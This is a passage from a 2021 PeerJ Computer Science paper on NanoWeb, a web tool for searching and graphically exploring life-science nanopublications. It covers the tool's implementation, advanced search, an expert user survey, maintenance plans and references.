(Fig. 7.2) and it is provided with the following buttons: 1. Nanopub List Only: It shows a full-screen view of just the nanopublications list layer. 2. Display Both: It opens a two-layers view consisting of the nanopublications list layer and the currently active layer between Graph and Information layers. For instance, Fig. 7 shows the Graph layer on the right side of the nanopublications list layer. 3. Graph Only/Nanopub Info Only: It shows a full-screen view of the current layer, which can be the Graph layer or the Information layer. For instance, Fig. 7 shows this button with the text “Graph Only”, since the Graph layer is active. Graph exploration Figure 8 shows a multi-level graph exploration for the nanopublication with the title mutL homolog 1—Colorectal Carcinoma, which describes a gene-disease association. This functionality allows the user to explore the relation network of the considered nanopublications. Besides, the graph exploration allows the user to understand how and why different nanopublications are connected. There is no limit to the depth of the exploration, that is, to the graph’s dimension visualized. The user can potentially expand the graph at will until all the nodes connected in the relation network are displayed. In this way, the synthesis power of nanopublications is enhanced by the value of the relation network; it provides a greater information contribution than the sum of the single nanopublications taken separately. Since the graph can have a high density of connections, only a portion of the connected nodes is shown for a new graph expansion request. However, the user could be interested in a specific connection between two nodes, which may not be shown by default. Hence, it is possible to search for specific connections directly on the nanopublication semantic network—we call this functionality “connected entities search”. Figure 9 shows the connected entities search in action. In particular, we see the entities connected to the mutL homolog 1 gene. When the user right-clicks on the node associated with the mutL homolog 1 gene, the information window is shown on the right side. Inside the information window, there is the “connected entities” input field, where the user can specify the entity name s/he is looking for. For instance, when the user types polyposis, a list of matching entities appear, and the user can choose which entities to add to the graph by clicking on the plus button. Using the connected entities search, users can quickly verify whether a direct link between two nodes exists. The “connected entities search” is provided with auto-completion to ease the work of the user. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 18/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Implementation specifications NanoWeb back-end is developed using Django (https://www.djangoproject.com/), which is a Python-based free and open-source Web framework. The Web app front-end is developed using HTML5, CSS3, Bootstrap framework (https://getbootstrap.com/), JavaScript, jQuery (https://jquery.com/) and the library D3.js. (https://d3js.org/). In particular, to draw the nanopublication graphs, we used the D3 Force Layout, (https://d3-wiki.readthedocs.io/zh_CN/master/Force-Layout/) which is specifically designed to implement force-directed graphs. A force-directed graph is a graph where nodes are subjected to forces of two types: attractive and repulsive. These kinds of forces try to simulate physics scenarios where particles attract or repel each other. Here, the particles are the nodes of the graph, and the edges represent the presence of forces between nodes. When a new instance of a force-directed layout is created, a new D3 simulation starts, and the nodes become subjected to forces. The force-directed layout can be used both for cyclic and acyclic graphs, which can be either directed or not. To implement the graph exploration, we developed a custom, collapsible force-directed layout where nodes can be expanded or collapsed at will. This layout enables a user- friendly exploration of graphs leveraging on a functional disposition of children nodes around the parents. In particular, Fig. 8 shows that children nodes are displayed around parents at evenly spaced angles of an arc. This disposition is designed to facilitate the horizontal Figure 4 NanoWeb search interface with user-provided query: colorectal cancer. Full-size DOI: 10.7717/peerj-cs.335/fig-4 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 19/35 https://www.djangoproject.com/ https://getbootstrap.com/ https://jquery.com/ https://d3js.org/ https://d3-wiki.readthedocs.io/zh_CN/master/Force-Layout/ http://dx.doi.org/10.7717/peerj-cs.335/fig-4 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ expansion of the graph and prevent nodes from overlapping in a multi-level expansion. The custom force-directed layout developed and the NanoWeb code are publicly available (https://github.com/giachell/nanoweb). Advanced search In addition to keyword search, we introduced the advanced search to guide users in query formulation. The advanced search is based on structured terms that can be general purpose (e.g., nanopublication URLs, author ORCID and scientific evidence identifiers) or Figure 5 Information layer for the nanopublication. Full-size DOI: 10.7717/peerj-cs.335/fig-5 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 20/35 https://github.com/giachell/nanoweb http://dx.doi.org/10.7717/peerj-cs.335/fig-5 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ domain-specific (e.g., genes, diseases, proteins and tissues). Figure 10 shows one of the configurations available in the advanced search interface. The interface is based on filters enabling the users to perform boolean search and restrict the search results. Users can choose the search modality in the Search by drop-down menu, marked with number one in Fig. 10. The interface provides four different search modalities: 1. Topic: topic-based search is domain-specific, and it allows the user to find nanopublications for a specific topic. Currently, the available topics are genes, diseases, proteins, and tissues. The user can specify the chosen topic in the Choose topic drop- down menu, indicated with number two in Fig. 10. The user can also specify the name of the entity that s/he is looking for in the Entity name input field, marked with number three in Fig. 10. For instance, in Fig. 10 the chosen topic is GENE and the gene name is mutL homolog 1. Since gene and protein names could be quite complex to remember, the Entity name input field is provided with and auto-completion functionality. Once the user specifies the details about the topic, the list of related nanopublications is returned, so that the user can visualize and explore them as described for the keyword search interface. 2. Author: allows the user to find all the nanopublications related to a nanopublication/ evidence author. The provided author could be a nanopublication author or the author Figure 6 Data record for the nanopublication with title: mutL homolog 1—Colorectal Carcinoma. Full-size DOI: 10.7717/peerj-cs.335/fig-6 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 21/35 http://dx.doi.org/10.7717/peerj-cs.335/fig-6 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ of the scientific publications containing the evidence of nanopublication assertions. Users can search for a specific author by providing the author’s name or her/his ORCID identifier. The author input field is provided with auto-completion for both author names and ORCID identifiers. 3. Nanopublication ID: using this mode, users can search for a specific nanopublication via its identifier/URL. The users can take advantage of the auto-completion feature to search for all the nanopublications. 4. Evidence: this mode allows the users to get all the nanopublications extracted from a given scientific publication (i.e., evidence) starting from the publication DOI or PubMed URL (e.g., http://identifiers.org/pubmed/29970664). To define the advanced search interface filters we used structured terms (entities) collected from several public ontologies, databases and terminology resources concerning both life science and medical domains. For instance, we consider genes, diseases, proteins and tissues categories that users can use as filters. The machine-readable versions of the entities are contained in the nanopublications indexed by NanoWeb. To obtain their human-readable version, we leverage on public ontologies and databases. From these resources the associated labels are extracted, stored into the NanoWeb database and then linked to the respective machine-readable entities. To do so, we used some ontologies: Basic Formal Ontology (BFO) (https://basic-formal-ontology.org/), Chemical Entities of Biological Interest Ontology (CHEBI) (https://www.ebi.ac.uk/chebi/), Evidence and Conclusion Ontology (ECO) (https://www.evidenceontology.org/), Open Biological and Biomedical Ontology (OBO) (http://www.obofoundry.org/), Pathway Ontology (PW) (https://rgd.mcw.edu/rgdweb/ontology/search.html). Semanticscience Integrated Ontology (SIO) (https://github.com/MaastrichtU-IDS/semanticscience), Sequence Ontology (SO) (http://www.sequenceontology.org/). Additionally, as terminology resources we employed the National Center for Biotechnology Information (NCBI) (https://www.ncbi.nlm.nih.gov/ ), National Cancer Institute Thesaurus (NCIT) (https://ncit.nci.nih.gov/ncitbrowser/) and the Unified Medical Language System (UMLS) (https://www.nlm.nih.gov/research/ umls/index.html). The entities extracted from the resources mentioned above are also used for the mapping of nanopublication assertions—originally modeled as machine-readable RDF statements—into a human-readable form. To do so, NanoWeb exploits the entity types to determine the proper visual representation of nanopublication assertions. For instance, in the case of a DisGeNET gene-disease association (dgn-gda), the entity types are gene or disease. The entities are represented as nodes labeled with the human- readable versions of the corresponding URI used in the RDF serialization of the nanopublication. The nodes are connected together by an oriented edge from gene to disease. As an example let us consider the assertion of the nanopublication with identifier: RA3WLHsGFZrDU4kULrSa_pTa0gk8-mwadaj-LZ7kAqpog: miriam −gene :351 a ncit : C16612. l l d : C0002395 a ncit : C7057. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 22/35 http://identifiers.org/pubmed/29970664 https://basic-formal-ontology.org/ https://www.ebi.ac.uk/chebi/ https://www.evidenceontology.org/ http://www.obofoundry.org/ https://rgd.mcw.edu/rgdweb/ontology/search.html https://github.com/MaastrichtU-IDS/semanticscience http://www.sequenceontology.org/ https://www.ncbi.nlm.nih.gov/ https://ncit.nci.nih.gov/ncitbrowser/ https://www.nlm.nih.gov/research/umls/index.html https://www.nlm.nih.gov/research/umls/index.html http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ dgn−gda : DGNa4c88520d1a84e659043089f f f632d78 sio : SIO_000628 miriam −gene :351, lld : C0002395 ; a sio : SIO_001121. The assertion describes a gene-disease association (dgn-gda) between the NCBI gene amyloid beta precursor protein (miriam-gene:351) and the Alzheimer’s disease (lld: C0002395). The association type is more specifically a gene-disease biomarker association (SIO:001121). NanoWeb enriches the entities with additional information that can Figure 7 Graph layer for the nanopublication clicked by the user. Full-size DOI: 10.7717/peerj-cs.335/fig-7 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 23/35 http://dx.doi.org/10.7717/peerj-cs.335/fig-7 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ be inferred from the RDF graph of the nanopublication. For instance, additional information are the types of the entities—for example, the fact that first entity (miriam- gene:351) is a gene (ncit:C16612) and that (lld:C0002395) is a disease (ncit:C7057). All these additional information are treated as entity properties that the user can access via the interactive visual representation of the nanopublication. The entity labels amyloid beta precursor protein and Alzheimer’s disease are taken respectively from the NCBI and Linked Life Data platforms. The entity labels are resolved from entity identifiers by relying on public API endpoints such as the Entrez Programming Utilities (E-utilities) Figure 9 Graph exploration: search for mutL homolog 1 (MLH1) connected entities. Full-size DOI: 10.7717/peerj-cs.335/fig-9 Figure 8 Graph exploration: the information window for mutS homolog 6—Carcinogenesis is displayed as a result for the user click on the edge. Full-size DOI: 10.7717/peerj-cs.335/fig-8 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 24/35 http://dx.doi.org/10.7717/peerj-cs.335/fig-9 http://dx.doi.org/10.7717/peerj-cs.335/fig-8 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ (https://www.ncbi.nlm.nih.gov/books/NBK25501/) provided by NCBI. Nanopublications from the same platform (e.g., DisGeNET, NeXtProt, Protein Atlas, and Wikipathways) use the same authorities to identify entities (e.g., genes, diseases, proteins and tissues). However, when nanopublications from different platforms are visualized, it is sometimes necessary to reconcile different resource identifiers across authorities to link the same entities to others using different identifiers. In the visual representation only one valid identifier is presented for each entity to keep the interface as clean as possible. Expert users survey To better understand the needs of the nanopublication community and improve the critical functionalities of NanoWeb, we conducted an expert users survey to collect feedback from nanopublication and domain experts. We advertised NanoWeb on the nanopublication public mailing lists, on social media targeting the potentially interested communities and private emails to the authors of papers about nanopublications. We asked the nanopublication experts involved in the survey to use NanoWeb, and then to answer a questionnaire. It should be noticed that we did not provide any tutorial to inform the users about NanoWeb functions because we also wanted to investigate how intuitive the system is for first-time users and how steep its learning curve is. The survey was composed of sixteen questions (Q(1–16)) divided in four sections. The majority of the questions is answered through the Likert five-point scale, ranging from 1 to 5 points, meaning different things depending on the question. Figure 10 Advanced search: search for nanopublications regarding the mutL homolog 1 gene. Full-size DOI: 10.7717/peerj-cs.335/fig-10 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 25/35 https://www.ncbi.nlm.nih.gov/books/NBK25501/ http://dx.doi.org/10.7717/peerj-cs.335/fig-10 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ 1. Personal information. This section is composed of four questions and collects basic information about the participants and their experience with nanopublications: � Q1: Do you have any experience with nanopublications? In this case the answer with 1 point in the Likert scale means: “Not at all” (i.e., I heard someone mentioning nanopublications once), while the 5 points one means: “Quite a lot” (i.e., I created some nanopublications myself) � Q2: Current Position? Single choice between: Academic, Industry, Master Student, PhD Student, PostDoc. � Q3: Primary domain of expertise? Multiple choices between: Art and architecture, Biology, Chemistry, Communication Science, Computers and the humanities, Computer Science, Economics, Life Science, Linguistics, Mathematics, Medicine, Physics, Psychology, Sociology. The survey considered fourteen participants in total, counting seven highly-experienced users (5 on the Likert scale) and nine experienced users (4 on the Likert scale). According to the data collected, the majority of the participants (85.7%) are from Academia. Also, according to Q3, the main domains of expertise of the participants are: Computer Science (57.1%), Chemistry (35.7%), Life Science (35.7%), Biology (28.6%), Medicine (14.3%). Computer Science indicates experts in the creation of nanopublications from the technical viewpoint, whereas the others are domain experts who might curate or use nanopublications in their daily work. 2. The relevance of the addressed problem. This section explores the existence and quality of other services enabling search, access, exploration, and re-use of nanopublications (all questions are answered according to a 1 (not at all) to 5 (quite a lot) Likert scale): � Q4: Is searching, accessing, and consulting nanopublications relevant for the stakeholders (e.g., researchers, developers, domain experts)? � Q5: To the best of your knowledge, are the currently available tools and services adequate for searching and accessing nanopublications? � Q6: To the best of your knowledge, do other tools and services offer interactive visualizations to interact with nanopublications? � Q7: To the best of your knowledge, do other available tools and services offer visual exploration possibilities of the nanopublication relation network? According to the data collected for questions Q(4–7), the majority of the participants (57%) considers the problem addressed by NanoWeb relevant or very relevant, pointing out the lack of other tools and services for the interactive visualization and exploration of nanopublications and their relation network. About Q5, 50% of the participants consider the currently available tools and services for searching and accessing nanopublications inadequate (1 or 2 points on the Likert scale) and 42% are not enthusiastic about them (3 points on the Likert scale). 71% of the Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 26/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ participants answered that there are no other available tools offering interactive visualizations of nanopublications and 57% say there are no alternative tools to visually explore the nanopublication network . From these answers, we can see that the participants confirm our analysis highlighting the lack of intuitive and visual tools for the access and exploration of the nanopublications despite the confirmed utility of searching and accessing nanopublications for the stakeholders. 3. NanoWeb—Search Engine and Interface. The questions of this section are designed to evaluate the search capabilities of NanoWeb and the usability of its interface. This section was answered by twelve participants over fourteen. � Q8: Is NanoWeb search interface intuitive and easy-to-use? � Q9: Is NanoWeb capable of retrieving relevant nanopublications for a given query? � Q10: In your opinion, is a search based on keywords an effective way to seek for nanopublications? � Q(11–12): In your opinion, for the not technologically savvy, what is the most effective way to search nanopublications? Q11 and Q12 are the same, but the answers are different since for Q11 the range of answers is from 1: SPARQL end-point to 5: Keyword-based search; whereas, for Q12 the range is from 1: Faceted search to 5: Keyword search. � Q13: Will NanoWeb enhance the productivity of involved stakeholders (researchers, developers, nanopublication experts)? About question Q8 , the majority of the participants consider NanoWeb search interface intuitive and easy-to-use (75% answered 4 or above and none answered below 3). There is no accordance instead for Q9 (median = 3, mean = 3.08, STD = 1.04), 42% of the participants answered 3 which means “not sure” and the rest of them is divided into the two other classes “not really” (≤2: 33%) and “quite a lot” (≥4: 25%). One reason that could motivate this kind of distribution might be that participants did not know what they could search in advance, thus many user queries might have not produced the expected results. To address this issue, after the survey we introduced the advanced search which guides users on NanoWeb search capabilities. Participants are well-distributed for Q10 (median = 3, mean = 3.25, STD = 1.16), there is not a preferred opinion about keyword search; nevertheless, 46% of the participants consider the search based on keywords quite an effective or highly effective (answer 4 or above) way to seek for nanopublications. About Q(11–12), the majority of the participants (58%) consider that keyword-based search is more effective than SPARQL end-point but less effective than faceted search (67%) for the non-technologically savvy. This answer shows how domain experts are more accustomed to use faceted search rather than keyword search for searching structured data as nanopublications are. Keyword search is considered useful, but it should not substitute faceted search as a means to access RDF scientific data. Finally, all the participants believe NanoWeb can moderately (58%) or substantially (42%) enhance the productivity of researchers and nanopublication experts. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 27/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ 4. NanoWeb—Visual Exploration. This section of the questionnaire evaluates the experience with the NanoWeb user interface for visual exploration of nanopublications. We designed the questions of this section to investigate whether the visual exploration of nanopublication graphs could lead to the discovery of meaningful relationships and information potentially unknown to the experts. Moreover, we asked the participants to compare NanoWeb with the currently available alternative tools. This section consists of three questions: � Q14: Do you feel comfortable with the interface for the visual exploration? � Q15: Could the visual exploration of the nanopublication graphs lead to the discovery of meaningful relationships and information not known in advance? � Q16: Is NanoWeb visual exploration innovative with respect to the currently available alternative tools and techniques? With reference to Q14 , the majority (64%) of the participants felt very comfortable with the interface for the visual exploration and only 14% gave a score below three points. Moreover, 57% of the participants believe the visual exploration of the nanopublication graphs could lead to the discovery of meaningful relationships and information not known in advance . Finally, half of the participants think that NanoWeb is highly innovative (four or five points) with respect to the state of the art, while only 21% thinks it is only marginally innovative. User feedback Finally, we asked the participants to provide some feedback and suggestions to improve NanoWeb. The feedback collected shows that users have appreciated the system: � “I very much appreciate the tool, and I think it can be a great push for better accessing and using nanopublications by everyone!” � “I consider the NanoWeb proposal a smart insight for searching nanopublications.” We also received useful suggestions to improve the system: � “I found the visual exploration innovative, but I think it could be improved by a better UI/UX.” � “Good work! I would suggest that you enable URL-based searching.” � “Consider replacement of keyword search with a concept-based search. This can also be used to enable auto-suggest functionality based on the resources (genes, diseases, etc)” � “I really like the application, but at the end of the day it is dependent on the indexed data. It would be great if there were a possibility to suggest datasets to be included or even better, to be able to add them myself!” � “Downloading of the results as a dataset of nanopublications would be most welcome too. Even better, a Cytoscape plugin that allows me to pull in the full network. I’m looking forward to seeing where you are taking this. Success!” Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 28/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ We consider the user feedback of great value, so we decided to improve NanoWeb according to the received suggestions. Firstly, we improved both the user interface and experience (UI/UX), providing a responsive mobile device layout. Then, we improved the search system so that a user can perform URL-based searching. Currently, NanoWeb allows the users to find the authors from the ORCID ids; a specific nanopublication from its URL/identifier; and, all the nanopublications related to one particular evidence paper provided its DOI. The prominent feature we added to NanoWeb, thanks to the user feedback, is the advanced search, as described in “NanoWeb Graphical User Interface”. The Advanced search interface is based on structured terms extracted from the life science domain, it enables users to search for nanopublications based on topics (e.g., genes, diseases, proteins, etc.), scientific evidence and authors. Finally, based on the collected feedback, we planned several further improvements to the system that we discuss as future work in “Conclusions”. DISCUSSION ON MAINTAINING ASPECTS NanoWeb aims to provide users unified access to nanopublications and to search and explore them through a human-readable interface. Since NanoWeb is tailored for both the life science and medical domains, it is designed to help the experts of these domains in their research work. It also allows users that do not have a prior knowledge about nanopublication to easily interpret and understant the returned content. Several challenges need to be addressed to maintain a stable, citable system like what NanoWeb aims to be. The major system maintaining challenges are: 1. Ensure persistent access and re-use of data: to guarantee persistent and reliable access to data and avoid broken URLs, NanoWeb uses persistent URLs and identifiers to refer to resources. All the indexed nanopublications are directly accessible through a persistent URL provided by the W3C Permanent Identifier Community Group (https://w3id.org/). The nanopublication’s persistent URL format is: http://w3id.org/ nanoweb/landingpage/, where the ID in brackets is the nanopublication identifier and satisfies the regular expression: ^RA[A-Za-z0-9_\-]{43}$. Nanopublications use persistent identifiers, that allow to access them across different providers. Even if one of the several nanopublication providers is unreachable in a given moment, the others can provide access by using the same identifiers. As for nanopublications, NanoWeb itself is reachable through the persistent URL: http://w3id.org/nanoweb/. 2. Long-term preservation of resources: every information concerning nanopublications is saved in NanoWeb databases, that are stored in network hard drives using redundancy policies such as Redundant Array of Independent Disks (RAID). The redundancy policies adopted and daily back-up routines are designed to prevent loss of data and ensure long-term preservation. 3. Ongoing hosting: NanoWeb is hosted within the cloud architecture of the University of Padova. The institutional cloud architecture and network infrastructure provide a Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 29/35 https://w3id.org/ http://w3id.org/nanoweb/landingpage/<ID> http://w3id.org/nanoweb/landingpage/<ID> http://w3id.org/nanoweb/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ reliable connection service as well as a protection layer from external attacks. A team of system administrators actively control the cloud/network infrastructure and support NanoWeb. NanoWeb is developed in the context of the European project ExaMode3 which guarantees financial support until 2023. Within the project there are sustainability policies that should guarantee the maintenance of the developed tools well beyond the termination of the project. CONCLUSIONS Scientific and scholarly communications are growing at an incredible speed, and it is hardly possible to keep track of the discoveries and statements presented in the literature, even considering only a specific domain. Moreover, the “redundancy of statements in multiple fora makes it difficult to identify attribution, quality, and provenance” (Groth, Gibson & Velterop, 2010). Hence, the nanopublication model has been proposed to quickly identify, search, and access scientific facts extracted from papers. Nanopublications are represented as graphs centered on a scientific statement (i.e., the assertion) that makes provenance, attribution, and scientific information machine- readable. Nanopublications are concise noise-free resources characterized by high information density. Leveraging on the semantic-oriented RDF structure, nanopublications efficiently convey information and concepts. Hence, these features make nanopublications particularly suitable for enabling data search, information extraction, and automatic reasoning over scientific facts. Despite the promising features of nanopublications, their use is still restricted to highly-specialized scientific circles. The central limit to the full exploitation of nanopublications is the lack of services enabling their search, access, exploration, and re-use. Search is limited to the use of structured query languages as SPARQL, and a service to search over all the publicly available nanopublications at once is not available. Nanopublications are machine- readable, but no human-readable counterpart is generated and open to the public. Nanopublications create a vast relation network of scientific facts that could lead to discoveries, but up to now, there are no automatic or manual services enabling graph exploration. The goal of this work is to provide unified access to Life Science nanopublications in order to allow users to search, access, explore, and re-use them on the Web. To this end, we have designed and developed a Web application called NanoWeb, that allows the users to (i) search for domain-specific nanopublications using keywords (as they are accustomed to do with Web search engines); (ii) explore their relation network to discover new nanopublications and meaningful connections; (iii) access and understand their content; (iv) connect to the evidence paper and access the related data record in external curated scientific databases; and, (v) easily cite nanopublications when they are re-used in new scientific contexts. We also presented the benefits of the serendipity-oriented perspective enabled by NanoWeb in the Life Science domain. We showed how the exploration of nanopublication 3 European Union Horizon 2020 program under Grant Agreement no. 825292. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 30/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ graphs could enrich domain knowledge and point out interesting gene-disease connections. As future work, we plan to extend the system by providing the user with the capability of exploring a new graph generated from an arbitrary set of Life Science nanopublications selected by the user. This functionality represents a significant improvement for the graph exploration since the initial relation network already considers different nanopublications, instead of starting the graph exploration from a single one. In this way it is possible to highlight, for instance, the set of common diseases due to a selection of genes or, conversely, the set of common genes that cause the disease of interest. Moreover, we plan to crawl and index the Life Science nanopublications that are not currently available on the Web, if not downloading large archive files which are hardly usable. As future work, we plan to further improve NanoWeb according to the expert users survey’s feedback. We will allow the users to add datasets or other domain-specific nanopublication sources to be crawled and indexed by the system. We will add the possibility to select and download custom-made sets of nanopublications. We will propose a customized user experience to save lists of favorite nanopublications, entities, and associations and notify when something new is published. We will dedicate a fair amount of work to the extension of search functionalities to improve keyword search and to include faceted search which is required by the stakeholders. Indeed, faceted search is commonly adopted solution (Arenas et al., 2016) to search RDF data. A faceted search is particularly useful when it is applied to domain- specific data. For instance, in gene-disease associations, the faceted search can be used to search for specific genes or specific diseases, filtering out all the entities not relevant to the search. Faceted search can be associated with auto-completion functionalities to ease the users’ work. Finally, we plan to improve keyword-based searches with ontology and database ID lookups. ACKNOWLEDGEMENTS The authors wish to thank Erika Fabris for the work on the citation of nanopublications and the development of some APIs used in this work. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Computational Data Citation (CDC-STARS) project of the University of Padua, and by the ExaMode Project, as a part of the European Union Horizon 2020 Program under Grant 825292. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Union Horizon 2020 Program: 825292. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 31/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � Fabio Giachelle conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Dennis Dosso performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Gianmaria Silvello conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Source code is available at GitHub: https://github.com/giachell/nanoweb. The indexed nanopublications are also publicly available here: http://app.tkuhn. eculture.labs.vu.nl/nanopub-monitor/. REFERENCES Agrawal S, Chaudhuri S, Das G. 2002. Dbxplorer: a system for keyword-based search over relational databases. In: Proceedings of the 18th International Conference on Data Engineering, ICDE 2002. IEEE Computer Society, 5–16. Amith M, Tao C. 2018. Representing vaccine misinformation using ontologies. Journal of Biomedical Semantics 9(1):22 DOI 10.1186/s13326-018-0190-0. Arenas M, Cuenca Grau B, Kharlamov E, Marciuška S, Zheleznyakov D. 2016. Faceted search over RDF-based knowledge graphs. Journal of Web Semantics 37-38:55–74 DOI 10.1016/j.websem.2015.12.002. Balmin A, Hristidis V, Koudas N, Papakonstantinou Y, Srivastava D, Wang T. 2003. A system for keyword proximity search on XML databases. In: Proceedings of 29th International Conference on Very Large Data Bases, VLDB. Morgan Kaufmann, 1069–1072. Bast H, Buchhold B, Haussmann H. 2016. Semantic search on text and knowledge bases. Foundations and Trends in Information Retrieval 10(2–3):119–271 DOI 10.1561/1500000032. Bhalotia G, Hulgeri A, Nakhe C, Chakrabarti S, Sudarshan S. 2002. Keyword searching and browsing in databases using BANKS. In: Proceedings of the 18th International Conference on Data Engineering. IEEE Computer Society, 431–440. Biryukov M, Groues V, Satagopam V, Schneider R. 2018. Biokb-text mining and semantic technologies for biomedical content discovery. Available at https://biokb.lcsb.uni.lu/. Bizer C, Heath T, Berners-Lee T. 2009. Linked data—the story so far. International Journal on Semantic Web and Information Systems 5(3):1–22. Borgman CL. 2015. Big data, little data, no data. Cambridge: MIT Press. Campregher C, Honeder C, Chung H, Carethers JM, Gasche C. 2010. Mesalazine reduces mutations in transforming growth factor β receptor ii and activin type ii receptor by improvement of replication fidelity in mononucleotide repeats. Clinical Cancer Research 16(6):1950–1956. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 32/35 https://github.com/giachell/nanoweb http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://dx.doi.org/10.1186/s13326-018-0190-0 http://dx.doi.org/10.1016/j.websem.2015.12.002 http://dx.doi.org/10.1561/1500000032 https://biokb.lcsb.uni.lu/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Carroll JJ, Bizer C, Hayes P, Stickler P. 2005. Named graphs, provenance and trust. In: Proceedings of the 14th International Conference on World Wide Web. ACM Press, 613–622. Carroll JJ, Stickler P. 2004. RDF triples in XML. In: Proc. of the WWW, 2004 Conference (Alternate Track Papers & Posters). ACM Press, 412–413. Chapman A, Simperl E, Koesten L, Konstantinidis G, Ibáñez LD, Kacprzak E, Groth P. 2020. Dataset search: a survey. VLDB Journal 29(1):251–272 DOI 10.1007/s00778-019-00564-x. Cheney J, Chiticariu L, Tan W. 2009. Provenance in databases: why, how, and where. Foundations and Trends in Databases 1(4):379–474 DOI 10.1561/1900000006. Chichester C, Gaudet P, Karch O, Groth PT, Lane L, Bairoch A, Mons B, Loizou A. 2014. Querying neXtProt nanopublications and their value for insights on sequence variants and tissue expression. Journal of Web Semantics 29:3–11 DOI 10.1016/j.websem.2014.05.001. Chichester C, Karch O, Gaudet P, Lane L, Mons B, Bairoch A. 2015. Converting neXtProt into linked data and nanopublications. Semantic Web 6(2):147–153 DOI 10.3233/SW-140149. Coffman J, Weaver AC. 2014. An empirical performance evaluation of relational keyword search techniques. IEEE Transactions on Knowledge and Data Engineering 26(1):30–42 DOI 10.1109/TKDE.2012.228. Dosso D, Silvello G. 2020. Search text to retrieve graphs: a scalable RDF keyword-based search system. IEEE Access 8:14089–14111 DOI 10.1109/ACCESS.2020.2966823. Elbassuoni S, Blanco R. 2011. Keyword search over RDF graphsIn: Proc. of the 20th ACM Conference on Information and Knowledge Management, CIKM 2011. New York: ACM Press, 237–242. Fabris E, Kuhn T, Silvello G. 2019. A framework for citing nanopublications. In: Doucet A, Isaac A, Golub K, Aalberg T, Jatowt A, eds. Proc. of the 23rd International Conference on Theory and Practice of Digital Libraries, TPDL 2019, volume 11799 of Lecture Notes in Computer Science. Berlin: Springer, 70–83. Groth P, Gibson A, Velterop J. 2010. The anatomy of a nanopublication. Information Services & Use 30(1–2):51–56 DOI 10.3233/ISU-2010-0613. Hettne KM, Thompson M, Van Haagen H, Van der Horst E, Kaliyaperumal R, Mina E, Tatum Z, Laros JFJ, Van Mulligen EM, Schuemie M, Aten E, Li TS, Bruskiewich R, Good BM, Su AI, Kors JA, Den Dunnen J, Van Ommen GJB, Roos M, ‘t Hoen PA, Mons B, Schultes EA. 2016. The implicitome: a resource for rationalizing gene-disease associations. PLOS ONE 11(2):1–21. Hey T, Tansley S, Tolle K. 2009. The fourth paradigm: data-intensive scientific discovery. New York: Microsoft Research. Kadilierakis G, Fafalios P, Papadakos P, Tzitzikas Y. 2020. Keyword search over RDF using document-centric information retrieval systems. In: The Semantic Web. Cham: Springer International Publishing, 121–137. Kopliku A, Pinel-Sauvagnat K, Boughanem M. 2014. Aggregated search: a new information retrieval paradigm. ACM Computing Surveys 46((3): 41)):1–41, 31 DOI 10.1145/2523817. Kuhn T, Barbano PE, Nagy ML, Krauthammer M. 2013. Broadening the scope of nanopublications. In: Proceedings of the Semantic Web: Semantics and Big Data, 10th International Conference, ESWC 2013, volume 7882 of LNCS. Berlin: Springer, 487–501. Kuhn T, Meroño-Peñuela A, Malic A, Poelen JH, Hurlbert AH, Ortiz EC, Furlong LI, Queralt- Rosinach N, Chichester C, Banda JM, Willighagen EL, Ehrhart F, Evelo CTA, Malas TB, Dumontier M. 2018. Nanopublications: a growing resource of provenance-centric scientific linked data. In: 14th IEEE International Conference on e-Science, e-Science 2018. IEEE Computer Society, 83–92. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 33/35 http://dx.doi.org/10.1007/s00778-019-00564-x http://dx.doi.org/10.1561/1900000006 http://dx.doi.org/10.1016/j.websem.2014.05.001 http://dx.doi.org/10.3233/SW-140149 